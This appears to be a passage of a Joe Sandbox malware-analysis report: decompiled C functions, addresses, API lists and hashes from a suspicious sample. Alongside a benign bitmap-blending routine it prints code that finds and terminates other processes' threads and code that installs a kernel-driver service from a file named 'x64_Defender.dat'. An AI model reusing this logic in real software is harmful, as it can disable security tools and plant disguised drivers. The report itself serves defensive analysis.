				int _t207;
				int _t211;
				signed char _t214;
				signed char _t216;
				signed int _t218;
				void* _t220;
				signed int _t222;
				void* _t224;
				signed int _t226;
				void* _t228;
				signed int _t230;
				void* _t232;
				signed int _t234;
				void* _t236;
				signed int _t238;
				signed int _t242;
				signed char _t243;
				void* _t247;
				void* _t250;
				void* _t256;
				int _t263;
				unsigned int _t264;
				signed char _t266;
				signed char _t268;
				signed int _t270;
				signed int _t282;
				signed int _t289;
				signed int _t291;
				signed int _t293;
				signed int _t294;
				signed int _t296;
				void* _t309;
				signed char _t310;
				unsigned int _t311;
				int _t328;
				signed int _t329;
				intOrPtr _t331;
				int _t333;
				int _t336;
				int _t338;
				void* _t340;
				void* _t343;
				void* _t345;
				signed long long* _t350;
				signed long long _t358;
				long long _t360;
				signed long long _t361;
				signed long long _t362;
				int _t367;
				int _t370;
				signed long long _t372;

				_push(0x48);
				E00DDD52C(0xe0c5ca, __ebx, __edi, __esi);
				_t331 = __ecx;
				_v68 = __ecx;
				if(_a24 == 0x64 || _a20 - _a12 <= 0 || _a16 - _a8 <= 0) {
					L5:
					_t162 = 1;
					goto L6;
				} else {
					if( *((intOrPtr*)(E00CC19ED() + 0x1ac)) > 8) {
						__eflags = _a36 - 0xffffffff;
						if(_a36 == 0xffffffff) {
							L10:
							_t328 = _a16 - _a8;
							_t263 = _a20 - _a12;
							_v60 = _t328;
							_v64 = _t263;
							E00CB9032( &_v56);
							_v4 = _v4 & 0x00000000;
							_t170 =  *(_t331 + 4);
							__eflags = _t170;
							if(_t170 != 0) {
								_t170 =  *(_t170 + 4);
							}
							_t172 = E00CB9B84(_t263,  &_v56, CreateCompatibleDC(_t170));
							__eflags = _t172;
							if(_t172 != 0) {
								_v28 = _v28 & 0x00000000;
								_v32 = 0xe196b4;
								_v4 = 1;
								_t175 = E00CB9BC6(_t263,  &_v32, _t328, CreateCompatibleBitmap( *( *(_t331 + 4) + 4), _t328, _t263));
								__eflags = _t175;
								if(_t175 == 0) {
									L58:
									_v32 = 0xe196b4;
									E00CB91F0( &_v32, _t309);
									goto L13;
								} else {
									_t178 = E00CBA251(_v52, _v28);
									_v72 = _t178;
									__eflags = _t178;
									if(__eflags == 0) {
										_t179 = E00CAA4E7(_t263,  &_v32, _t328, _t331, __eflags);
										asm("int3");
										_t358 = _v8;
										asm("fcom st0, st1");
										asm("fnstsw ax");
										st1 = _t358;
										__eflags = _t179 & 0x00000041;
										if((_t179 & 0x00000041) != 0) {
											asm("fldz");
											asm("fcomp st0, st1");
											asm("fnstsw ax");
											__eflags = _t179 & 0x00000041;
											if((_t179 & 0x00000041) == 0) {
												_t370 = _t358 +  *0xe22f28;
												goto L63;
											}
										} else {
											_t370 = _t358 -  *0xe22f28;
											L63:
											_a12 = _t370;
										}
										_t360 =  *0xe22f08;
										asm("fcom st0, st1");
										asm("fnstsw ax");
										__eflags = _t179 & 0x00000041;
										if((_t179 & 0x00000041) != 0) {
											_t361 =  *0xe22f30;
											asm("fcomp st0, st3");
											asm("fnstsw ax");
											st2 = _t361;
											__eflags = _t179 & 0x00000041;
											if((_t179 & 0x00000041) != 0) {
												_t362 =  *0xe22f20;
												asm("fcom st0, st1");
												asm("fnstsw ax");
												__eflags = _t179 & 0x00000041;
												if((_t179 & 0x00000041) != 0) {
													st1 = _t362;
													st0 = _t362;
													st0 = _t362;
												} else {
													_t367 = _a8 - st1;
													asm("fxch st0, st2");
													asm("fsubrp st3, st0");
													asm("fxch st0, st1");
													goto L66;
												}
											} else {
												st0 = _t361;
												st0 = _t361;
												_t367 = _a8;
												goto L69;
											}
										} else {
											st2 = _t360;
											_t367 = _a8 - st1;
											L66:
											asm("fmulp st2, st0");
											asm("fxch st0, st1");
											asm("fdivrp st2, st0");
											asm("faddp st1, st0");
											L69:
											_a4 = _t367;
										}
										return L00DDD820();
									} else {
										_v84 = _t328;
										_v80 = _t263;
										_t183 = E00D0A33C( &_v84,  &_v16);
										_v76 = _t183;
										__eflags = _t183;
										if(_t183 == 0) {
											goto L58;
										} else {
											__eflags = _v16;
											if(_v16 == 0) {
												goto L58;
											} else {
												SelectObject(_v52, _t183);
												_t185 =  *(_t331 + 4);
												__eflags = _t185;
												if(_t185 != 0) {
													_t185 =  *(_t185 + 4);
												}
												BitBlt(_v52, 0, 0, _t328, _t263, _t185, _a8, _a12, 0xcc0020);
												_t310 = _a28;
												__eflags = _t310 - 0xffffffff;
												if(_t310 != 0xffffffff) {
													_t281 = ((_t310 & 0x000000ff) << 0x00000008 | (_t310 & 0x0000ffff) >> 0x00000008) << 8;
													_t310 = _t310 >> 0x00000010 & 0x000000ff | ((_t310 & 0x000000ff) << 0x00000008 | (_t310 & 0x0000ffff) >> 0x00000008) << 0x00000008;
													__eflags = _t310;
													_a28 = _t310;
												}
												_t188 = _t263 * _t328;
												_v20 = _t188;
												__eflags = _t188;
												if(_t188 > 0) {
													_t372 =  *0xe19cb0;
													_t329 = _v16;
													do {
														__eflags = _a32;
														_t264 =  *_t329;
														if(_a32 <= 0) {
															__eflags = _t264 - _t310;
															if(_t264 != _t310) {
																goto L30;
															}
														} else {
															st0 = _t372;
															_t247 = E00DEC8A6(_t310, (_t264 & 0x000000ff) - (_t310 & 0x000000ff));
															_pop(_t281);
															__eflags = _t247 - _a32;
															if(_t247 >= _a32) {
																L28:
																_t372 =  *0xe19cb0;
																L30:
																__eflags = _a24 - 0xffffffff;
																_t196 = _t264;
																if(_a24 != 0xffffffff) {
																	_t311 = _a36;
																	__eflags = _t311 - 0xffffffff;
																	if(__eflags != 0) {
																		_t282 = _t196 & 0x000000ff;
																		st0 = _t372;
																		_v24 = (_t264 & 0x0000ffff) >> 8;
																		_v16 = _t264 >> 0x00000010 & 0x000000ff;
																		_t333 = (_t311 >> 0x00000010 & 0x000000ff) - _t282;
																		_v36 = _t282;
																		_t202 = MulDiv(_t333, _a24, 0x64);
																		_t266 = _v36;
																		__eflags = _t202 + _t266 - 0xff;
																		if(_t202 + _t266 <= 0xff) {
																			_t205 = MulDiv(_t333, _a24, 0x64) + _t266;
																			__eflags = _t205;
																			_v36 = _t205;
																		} else {
																			_v36 = 0xff;
																		}
																		_t336 = ((_a36 & 0x0000ffff) >> 8) - _v24;
																		_t207 = MulDiv(_t336, _a24, 0x64);
																		__eflags = _t207 + _v24 - 0xff;
																		if(_t207 + _v24 <= 0xff) {
																			_t268 = MulDiv(_t336, _a24, 0x64) + _v24;
																			__eflags = _t268;
																		} else {
																			_t268 = 0xff;
																		}
																		_t338 = (_a36 & 0x000000ff) - _v16;
																		_t211 = MulDiv(_t338, _a24, 0x64);
																		__eflags = _t211 + _v16 - 0xff;
																		if(_t211 + _v16 <= 0xff) {
																			_t214 = MulDiv(_t338, _a24, 0x64) + _v16;
																			__eflags = _t214;
																		} else {
																			_t214 = 0xff;
																		}
																		_t289 = (_t214 & 0x000000ff | 0xffffff00) << 0x00000008 | _t268 & 0x000000ff;
																		__eflags = _t289;
																		_t216 = _v36;
																		goto L53;
																	} else {
																		asm("fild dword [ebp+0x18]");
																		_t350 = _t350 - 0x18;
																		_v40 = _t372;
																		asm("fst qword [esp+0x10]");
																		asm("fst qword [esp+0x8]");
																		 *_t350 = _t372 * _v40;
																		_push(_t264);
																		_t218 = E00D0DBA0(_t281, __eflags);
																		_t329 = _v16;
																		 *_t329 = _t218 | 0xff000000;
																	}
																} else {
																	st0 = _t372;
																	_t340 = (_t196 & 0x000000ff) + (_t196 & 0x000000ff);
																	_t220 = E00CC19ED();
																	_t291 = 3;
																	_t222 = ( *(_t220 + 0x26) & 0x000000ff) + _t340;
																	__eflags = _t222 / _t291 - 0xff;
																	if(_t222 / _t291 <= 0xff) {
																		_t224 = E00CC19ED();
																		_t293 = 3;
																		_t226 = ( *(_t224 + 0x26) & 0x000000ff) + _t340;
																		__eflags = _t226 % _t293;
																		_v24 = _t226 / _t293;
																	} else {
																		_v24 = 0xff;
																	}
																	_t343 = ((_t264 & 0x0000ffff) >> 8) + ((_t264 & 0x0000ffff) >> 8);
																	_t228 = E00CC19ED();
																	_t294 = 3;
																	_t230 = ( *(_t228 + 0x25) & 0x000000ff) + _t343;
																	__eflags = _t230 / _t294 - 0xff;
																	if(_t230 / _t294 <= 0xff) {
																		_t232 = E00CC19ED();
																		_t296 = 3;
																		_t234 = ( *(_t232 + 0x25) & 0x000000ff) + _t343;
																		__eflags = _t234 % _t296;
																		_v16 = _t234 / _t296;
																	} else {
																		_v16 = 0xff;
																	}
																	_t345 = (_t264 >> 0x00000010 & 0x000000ff) + (_t264 >> 0x00000010 & 0x000000ff);
																	_t236 = E00CC19ED();
																	_t270 = 3;
																	_t238 = ( *(_t236 + 0x24) & 0x000000ff) + _t345;
																	__eflags = _t238 / _t270 - 0xff;
																	if(_t238 / _t270 <= 0xff) {
																		_t242 = ( *(E00CC19ED() + 0x24) & 0x000000ff) + _t345;
																		__eflags = _t242 % _t270;
																		_t243 = _t242 / _t270;
																	} else {
																		_t243 = 0xff;
																	}
																	_t289 = (_t243 & 0x000000ff | 0xffffff00) << 0x00000008 | _v16 & 0x000000ff;
																	_t216 = _v24;
																	L53:
																	_t281 = _t289 << 0x00000008 | _t216 & 0x000000ff;
																	__eflags = _t281;
																	 *_t329 = _t281;
																}
															} else {
																_t346 = _a28;
																_t250 = E00DEC8A6(_t310, ((_t264 & 0x0000ffff) >> 8) - ((_a28 & 0x0000ffff) >> 8));
																_pop(_t281);
																__eflags = _t250 - _a32;
																if(_t250 >= _a32) {
																	goto L28;
																} else {
																	_t256 = E00DEC8A6(_t310, (_t264 >> 0x00000010 & 0x000000ff) - (_t346 >> 0x00000010 & 0x000000ff));
																	_pop(_t281);
																	__eflags = _t256 - _a32;
																	if(_t256 >= _a32) {
																		goto L28;
																	}
																}
															}
															_t188 = _v20;
															_t310 = _a28;
															_t372 =  *0xe19cb0;
														}
														_t329 = _t329 + 4;
														_t188 = _t188 - 1;
														__eflags = _t188;
														_v16 = _t329;
														_v20 = _t188;
													} while (_t188 != 0);
													_t328 = _v60;
													st0 = _t372;
													_t263 = _v64;
													_t331 = _v68;
												}
												BitBlt( *( *(_t331 + 4) + 4), _a8, _a12, _t328, _t263, _v52, 0, 0, 0xcc0020);
												E00CBA251(_v52,  *((intOrPtr*)(_v72 + 4)));
												DeleteObject(_v76);
												_v32 = 0xe196b4;
												E00CB91F0( &_v32, _t310);
												E00CB91A4( &_v56);
												goto L5;
											}
										}
										goto L6;
									}
								}
							} else {
								L13:
								E00CB91A4( &_v56);
								goto L9;
							}
						} else {
							__eflags = _a24 - 0x64;
							if(_a24 <= 0x64) {
								goto L10;
							} else {
								L9:
								_t162 = 0;
								L6:
								return E00DDD4FA(_t162);
							}
						}
					} else {
						E00CDCDB3( *(_t331 + 4),  &_a8);
						goto L5;
					}
				}
			}

0x00d0d1df
0x00d0d1e6
0x00d0d1eb
0x00d0d1ed
0x00d0d1f4
0x00d0d224
0x00d0d226
0x00000000
0x00d0d20a
0x00d0d216
0x00d0d22f
0x00d0d233
0x00d0d23f
0x00d0d248
0x00d0d24b
0x00d0d24e
0x00d0d251
0x00d0d254
0x00d0d259
0x00d0d25d
0x00d0d260
0x00d0d262
0x00d0d264
0x00d0d264
0x00d0d272
0x00d0d277
0x00d0d279
0x00d0d285
0x00d0d289
0x00d0d295
0x00d0d2a6
0x00d0d2ab
0x00d0d2ad
0x00d0d630
0x00d0d633
0x00d0d63a
0x00000000
0x00d0d2b3
0x00d0d2b9
0x00d0d2be
0x00d0d2c1
0x00d0d2c3
0x00d0d644
0x00d0d649
0x00d0d653
0x00d0d656
0x00d0d658
0x00d0d65a
0x00d0d65c
0x00d0d65f
0x00d0d669
0x00d0d66b
0x00d0d66d
0x00d0d66f
0x00d0d672
0x00d0d674
0x00000000
0x00d0d674
0x00d0d661
0x00d0d661
0x00d0d67a
0x00d0d67a
0x00d0d67d
0x00d0d682
0x00d0d688
0x00d0d68a
0x00d0d68c
0x00d0d68f
0x00d0d6a5
0x00d0d6ab
0x00d0d6ad
0x00d0d6af
0x00d0d6b1
0x00d0d6b4
0x00d0d6c2
0x00d0d6c8
0x00d0d6ca
0x00d0d6cc
0x00d0d6cf
0x00d0d6e1
0x00d0d6e3
0x00d0d6e5
0x00d0d6d1
0x00d0d6d7
0x00d0d6d9
0x00d0d6db
0x00d0d6dd
0x00000000
0x00d0d6dd
0x00d0d6b6
0x00d0d6b6
0x00d0d6b8
0x00d0d6ba
0x00000000
0x00d0d6ba
0x00d0d691
0x00d0d691
0x00d0d699
0x00d0d69b
0x00d0d69b
0x00d0d69d
0x00d0d69f
0x00d0d6a1
0x00d0d6bd
0x00d0d6bd
0x00d0d6bd
0x00d0d6f6
0x00d0d2c9
0x00d0d2cc
0x00d0d2d3
0x00d0d2d7
0x00d0d2dc
0x00d0d2df
0x00d0d2e1
0x00000000
0x00d0d2e7
0x00d0d2e7
0x00d0d2eb
0x00000000
0x00d0d2f1
0x00d0d2f5
0x00d0d2fb
0x00d0d2fe
0x00d0d300
0x00d0d302
0x00d0d302
0x00d0d31a
0x00d0d320
0x00d0d323
0x00d0d326
0x00d0d339
0x00d0d33f
0x00d0d33f
0x00d0d341
0x00d0d341
0x00d0d346
0x00d0d349
0x00d0d34c
0x00d0d34e
0x00d0d354
0x00d0d35a
0x00d0d35d
0x00d0d35d
0x00d0d361
0x00d0d363
0x00d0d3c2
0x00d0d3c4
0x00000000
0x00000000
0x00d0d365
0x00d0d368
0x00d0d370
0x00d0d375
0x00d0d376
0x00d0d379
0x00d0d3ba
0x00d0d3ba
0x00d0d3ca
0x00d0d3ca
0x00d0d3ce
0x00d0d3d0
0x00d0d4a1
0x00d0d4a4
0x00d0d4a7
0x00d0d4d5
0x00d0d4d8
0x00d0d4e0
0x00d0d4e9
0x00d0d4f9
0x00d0d4fb
0x00d0d4ff
0x00d0d505
0x00d0d50f
0x00d0d511
0x00d0d524
0x00d0d524
0x00d0d526
0x00d0d513
0x00d0d513
0x00d0d513
0x00d0d537
0x00d0d53b
0x00d0d549
0x00d0d54b
0x00d0d55f
0x00d0d55f
0x00d0d54d
0x00d0d54d
0x00d0d54d
0x00d0d56d
0x00d0d571
0x00d0d57f
0x00d0d581
0x00d0d593
0x00d0d593
0x00d0d583
0x00d0d583
0x00d0d583
0x00d0d5a5
0x00d0d5a5
0x00d0d5a7
0x00000000
0x00d0d4a9
0x00d0d4a9
0x00d0d4ac
0x00d0d4af
0x00d0d4b5
0x00d0d4b9
0x00d0d4bd
0x00d0d4c0
0x00d0d4c1
0x00d0d4c6
0x00d0d4ce
0x00d0d4ce
0x00d0d3d6
0x00d0d3d9
0x00d0d3db
0x00d0d3dd
0x00d0d3e6
0x00d0d3eb
0x00d0d3f4
0x00d0d3f6
0x00d0d3fd
0x00d0d406
0x00d0d40b
0x00d0d40d
0x00d0d40f
0x00d0d3f8
0x00d0d3f8
0x00d0d3f8
0x00d0d418
0x00d0d41a
0x00d0d423
0x00d0d428
0x00d0d431
0x00d0d433
0x00d0d43a
0x00d0d443
0x00d0d448
0x00d0d44a
0x00d0d44c
0x00d0d435
0x00d0d435
0x00d0d435
0x00d0d455
0x00d0d457
0x00d0d465
0x00d0d46a
0x00d0d46e
0x00d0d470
0x00d0d481
0x00d0d483
0x00d0d483
0x00d0d472
0x00d0d472
0x00d0d472
0x00d0d497
0x00d0d499
0x00d0d5aa
0x00d0d5b0
0x00d0d5b0
0x00d0d5b2
0x00d0d5b2
0x00d0d37b
0x00d0d37b
0x00d0d38d
0x00d0d392
0x00d0d393
0x00d0d396
0x00000000
0x00d0d398
0x00d0d3ab
0x00d0d3b0
0x00d0d3b1
0x00d0d3b4
0x00000000
0x00000000
0x00d0d3b4
0x00d0d396
0x00d0d5b4
0x00d0d5b7
0x00d0d5ba
0x00d0d5ba
0x00d0d5c0
0x00d0d5c3
0x00d0d5c3
0x00d0d5c6
0x00d0d5c9
0x00d0d5c9
0x00d0d5d2
0x00d0d5d5
0x00d0d5d7
0x00d0d5da
0x00d0d5da
0x00d0d5f7
0x00d0d606
0x00d0d60e
0x00d0d617
0x00d0d61e
0x00d0d626
0x00000000
0x00d0d626
0x00d0d2eb
0x00000000
0x00d0d2e1
0x00d0d2c3
0x00d0d27b
0x00d0d27b
0x00d0d27e
0x00000000
0x00d0d27e
0x00d0d235
0x00d0d235
0x00d0d239
0x00000000
0x00d0d23b
0x00d0d23b
0x00d0d23b
0x00d0d227
0x00d0d22c
0x00d0d22c
0x00d0d239
0x00d0d218
0x00d0d21f
0x00000000
0x00d0d21f
0x00d0d216

APIs

__EH_prolog3.LIBCMT ref: 00D0D1E6
CreateCompatibleDC.GDI32(00000000), ref: 00D0D268
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00D0D29C
SelectObject.GDI32(?,00000000), ref: 00D0D2F5
BitBlt.GDI32(?,00000000,00000000,?,?,00000001,?,?,00CC0020), ref: 00D0D31A
MulDiv.KERNEL32(?,000000FF,00000064), ref: 00D0D4FF
MulDiv.KERNEL32(?,000000FF,00000064), ref: 00D0D51E
MulDiv.KERNEL32(000000FF,000000FF,00000064), ref: 00D0D53B
MulDiv.KERNEL32(000000FF,000000FF,00000064), ref: 00D0D557
MulDiv.KERNEL32(00000000,000000FF,00000064), ref: 00D0D571
MulDiv.KERNEL32(00000000,000000FF,00000064), ref: 00D0D58D
BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 00D0D5F7
DeleteObject.GDI32(?), ref: 00D0D60E

Part of subcall function 00CDCDB3: FillRect.USER32 ref: 00CDCDCF

Strings

d, xrefs: 00D0D235

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CompatibleCreateObject$BitmapDeleteFillH_prolog3RectSelect
String ID: d
API String ID: 3910664508-2564639436
Opcode ID: 3238bf41cbf04fc1807ff6a5adb15a0a38fc20345005de70ad8bd42b7aeaf193
Instruction ID: 531fdaed0878e4ac152e37516fb4e3ea7da343879a58f68dbf14638d241f8b05
Opcode Fuzzy Hash: 3238bf41cbf04fc1807ff6a5adb15a0a38fc20345005de70ad8bd42b7aeaf193
Instruction Fuzzy Hash: 1EF10071A0021A9FCB149FA5CD95BEE7BB2FF44340F20411AF989A62D2DB34C915DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00CA863A Relevance: 22.6, APIs: 15, Instructions: 116
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00CA863A(long __ecx, signed int __edx) {
				signed int _v8;
				char _v276;
				intOrPtr _v280;
				signed int _v284;
				signed int _v300;
				intOrPtr _v316;
				long _v320;
				void* _v328;
				long _v332;
				char _v336;
				void* _v340;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				void* _t31;
				void* _t41;
				long _t42;
				void* _t46;
				void* _t54;
				void* _t64;
				signed int _t66;
				void* _t67;

				_t63 = __edx;
				_t28 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t28 ^ _t66;
				_t64 = __ecx;
				_v332 = __ecx;
				_t65 = CreateToolhelp32Snapshot(4, 0);
				if(_t65 == 0xffffffff) {
					L3:
					_t31 = 0;
					L4:
					return E00DDCBCE(_t31, _t54, _v8 ^ _t66, _t63, _t64, _t65);
				}
				_v328 = 0x1c;
				if(Thread32First(_t65,  &_v328) != 0) {
					_t54 = CloseHandle;
					do {
						if(_v316 != _t64) {
							goto L13;
						}
						_t64 = OpenThread(0x1f03ff, 0, _v320);
						if(_t64 == 0) {
							goto L3;
						}
						_push(0);
						_push(4);
						_push( &_v336);
						_push(9);
						_push(_t64);
						if( *0xe897bc() < 0) {
							CloseHandle(_t64);
							goto L3;
						}
						_t41 = OpenProcess(0x1f0fff, 0, _v332);
						_v340 = _t41;
						if(_t41 == 0) {
							_t42 = GetLastError();
							_t65 = _t42;
							CloseHandle(_t64);
							SetLastError(_t42);
							goto L3;
						}
						__imp__GetMappedFileNameA(_t41, _v336,  &_v276, 0x104);
						_v300 = _v300 & 0x00000000;
						_v284 = _v284 & 0x00000000;
						_v280 = 0xf;
						E00CA1DDE( &_v276);
						_t63 = _v284;
						_t46 = E00CA4A61( >=  ? _v300 :  &_v300, _v284,  >=  ? _v300 :  &_v300,  >=  ? _v300 :  &_v300, 0x11);
						_t67 = _t67 + 0xc;
						if(_t46 != 0xffffffff) {
							TerminateThread(_t64, 0);
						}
						CloseHandle(_v340);
						CloseHandle(_t64);
						E00CA44CB( &_v300);
						_t64 = _v332;
						L13:
					} while (Thread32Next(_t65,  &_v328) != 0);
					CloseHandle(_t65);
					_t31 = 1;
					goto L4;
				}
				CloseHandle(_t65);
				goto L3;
			}

0x00ca863a
0x00ca8643
0x00ca864a
0x00ca8652
0x00ca8656
0x00ca8662
0x00ca8667
0x00ca868c
0x00ca868c
0x00ca868e
0x00ca869c
0x00ca869c
0x00ca866f
0x00ca8683
0x00ca869d
0x00ca86a3
0x00ca86a9
0x00000000
0x00000000
0x00ca86c2
0x00ca86c6
0x00000000
0x00000000
0x00ca86c8
0x00ca86ca
0x00ca86d2
0x00ca86d3
0x00ca86d5
0x00ca86de
0x00ca87d1
0x00000000
0x00ca87d1
0x00ca86f1
0x00ca86f7
0x00ca86ff
0x00ca87b9
0x00ca87c0
0x00ca87c2
0x00ca87c5
0x00000000
0x00ca87c5
0x00ca8718
0x00ca871e
0x00ca872b
0x00ca8739
0x00ca8743
0x00ca8755
0x00ca8766
0x00ca876b
0x00ca8771
0x00ca8776
0x00ca8776
0x00ca8782
0x00ca8785
0x00ca878d
0x00ca8792
0x00ca8798
0x00ca87a6
0x00ca87af
0x00ca87b3
0x00000000
0x00ca87b3
0x00ca8686
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00CA865C
Thread32First.KERNEL32 ref: 00CA867B
CloseHandle.KERNEL32(00000000), ref: 00CA8686
OpenThread.KERNEL32(001F03FF,00000000,?), ref: 00CA86BC
OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00CA86F1
GetMappedFileNameA.PSAPI(00000000,?,?,00000104), ref: 00CA8718
TerminateThread.KERNEL32(00000000,00000000), ref: 00CA8776
CloseHandle.KERNEL32(?), ref: 00CA8782
CloseHandle.KERNEL32(00000000), ref: 00CA8785
Thread32Next.KERNEL32 ref: 00CA87A0
CloseHandle.KERNEL32(00000000), ref: 00CA87AF
GetLastError.KERNEL32 ref: 00CA87B9
CloseHandle.KERNEL32(00000000), ref: 00CA87C2
SetLastError.KERNEL32(00000000), ref: 00CA87C5
CloseHandle.KERNEL32(00000000), ref: 00CA87D1

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CloseHandle$ErrorLastOpenThreadThread32$CreateFileFirstMappedNameNextProcessSnapshotTerminateToolhelp32
String ID:
API String ID: 3075758939-0
Opcode ID: 2baa29d3991120d6120b31fb72a9899a1554ae58f27978f74dec77266925db34
Instruction ID: 5aab86bf3a653e76c842aa7facbabe67cb2073bbb7febdb0cdefe73690412206
Opcode Fuzzy Hash: 2baa29d3991120d6120b31fb72a9899a1554ae58f27978f74dec77266925db34
Instruction Fuzzy Hash: 0841A271900219AFDB61AF61CC89BEE7BB8EF49715F1000D4F629A2190DF709E89CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00CA6AF3 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 100
serviceCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00CA6AF3(char* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				struct _SERVICE_STATUS _v36;
				void* _v40;
				void* _v44;
				char* _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				int _t21;
				void* _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				void* _t29;
				void* _t30;
				void* _t36;
				char* _t37;
				signed int _t40;

				_t35 = __edx;
				_t12 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t12 ^ _t40;
				_t37 = 0;
				_v48 = __ecx;
				_t36 = __edx;
				_v44 = __edx;
				_t14 = OpenSCManagerA(0, 0, 0xf003f);
				_v40 = _t14;
				if(_t14 != 0) {
					_push(_t26);
					_t27 = _a4;
					if(_t27 == 0) {
						L15:
						_t36 = CreateServiceA(_t14, _t36, _t36, 0xf01ff, 1, 3, 1, _v48, _t37, _t37, _t37, _t37, _t37);
						if(_t36 != 0 || GetLastError() == 0x431) {
							_t37 = 1;
							if(_t36 != 0) {
								goto L18;
							}
						}
					} else {
						_t36 = OpenServiceA(_t14, _t36, 0xf01ff);
						if(_t36 != 0) {
							_t28 = _t27;
							if(_t28 == 0) {
								_t36 = _v44;
								_t14 = _v40;
								goto L15;
							} else {
								_t29 = _t28 - 1;
								if(_t29 == 0) {
									_t21 = StartServiceA(_t36, 0, 0);
									goto L11;
								} else {
									_t30 = _t29 - 1;
									if(_t30 == 0) {
										_t21 = ControlService(_t36, 1,  &_v36);
										L11:
										if(_t21 != 0) {
											goto L9;
										} else {
											GetLastError();
										}
									} else {
										if(_t30 == 1 && DeleteService(_t36) != 0) {
											L9:
											_t37 = 1;
										}
									}
								}
								L18:
								CloseServiceHandle(_t36);
							}
						} else {
							GetLastError();
						}
					}
					CloseServiceHandle(_v40);
					_t14 = _t37;
					_pop(_t26);
				}
				return E00DDCBCE(_t14, _t26, _v8 ^ _t40, _t35, _t36, _t37);
			}

0x00ca6af3
0x00ca6af9
0x00ca6b00
0x00ca6b0a
0x00ca6b0c
0x00ca6b10
0x00ca6b13
0x00ca6b16
0x00ca6b1c
0x00ca6b21
0x00ca6b27
0x00ca6b28
0x00ca6b2d
0x00ca6b9a
0x00ca6bb6
0x00ca6bba
0x00ca6bcb
0x00ca6bce
0x00000000
0x00000000
0x00ca6bce
0x00ca6b2f
0x00ca6b3c
0x00ca6b40
0x00ca6b4d
0x00ca6b4f
0x00ca6b94
0x00ca6b97
0x00000000
0x00ca6b51
0x00ca6b51
0x00ca6b54
0x00ca6b8c
0x00000000
0x00ca6b56
0x00ca6b56
0x00ca6b59
0x00ca6b77
0x00ca6b7d
0x00ca6b7f
0x00000000
0x00ca6b81
0x00ca6b81
0x00ca6b81
0x00ca6b5b
0x00ca6b5e
0x00ca6b6b
0x00ca6b6d
0x00ca6b6d
0x00ca6b5e
0x00ca6b59
0x00ca6bd0
0x00ca6bd1
0x00ca6bd1
0x00ca6b42
0x00ca6b42
0x00ca6b42
0x00ca6b40
0x00ca6bda
0x00ca6be0
0x00ca6be2
0x00ca6be2
0x00ca6bf0

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,C:\DownLoad-Helper\x64_Defender.dat,?,?,?,?,?,?,?,00CA7CFA,00000002,00000064,00000000), ref: 00CA6B16
OpenServiceA.ADVAPI32(00000000,?,000F01FF,00000000,?,?,?,?,?,?,?,00CA7CFA,00000002,00000064,00000000), ref: 00CA6B36
GetLastError.KERNEL32(?,?,?,?,?,?,?,00CA7CFA,00000002,00000064,00000000), ref: 00CA6B42
DeleteService.ADVAPI32(00000000,?,?,?,?,?,?,?,00CA7CFA,00000002,00000064,00000000), ref: 00CA6B61
CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000001,00000003,00000001,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CA6BB0
GetLastError.KERNEL32(?,?,?,?,?,?,?,00CA7CFA,00000002,00000064,00000000), ref: 00CA6BBC
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00CA7CFA,00000002,00000064,00000000), ref: 00CA6BD1
CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,00CA7CFA,00000002,00000064,00000000), ref: 00CA6BDA

Strings

C:\DownLoad-Helper\x64_Defender.dat, xrefs: 00CA6B03

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
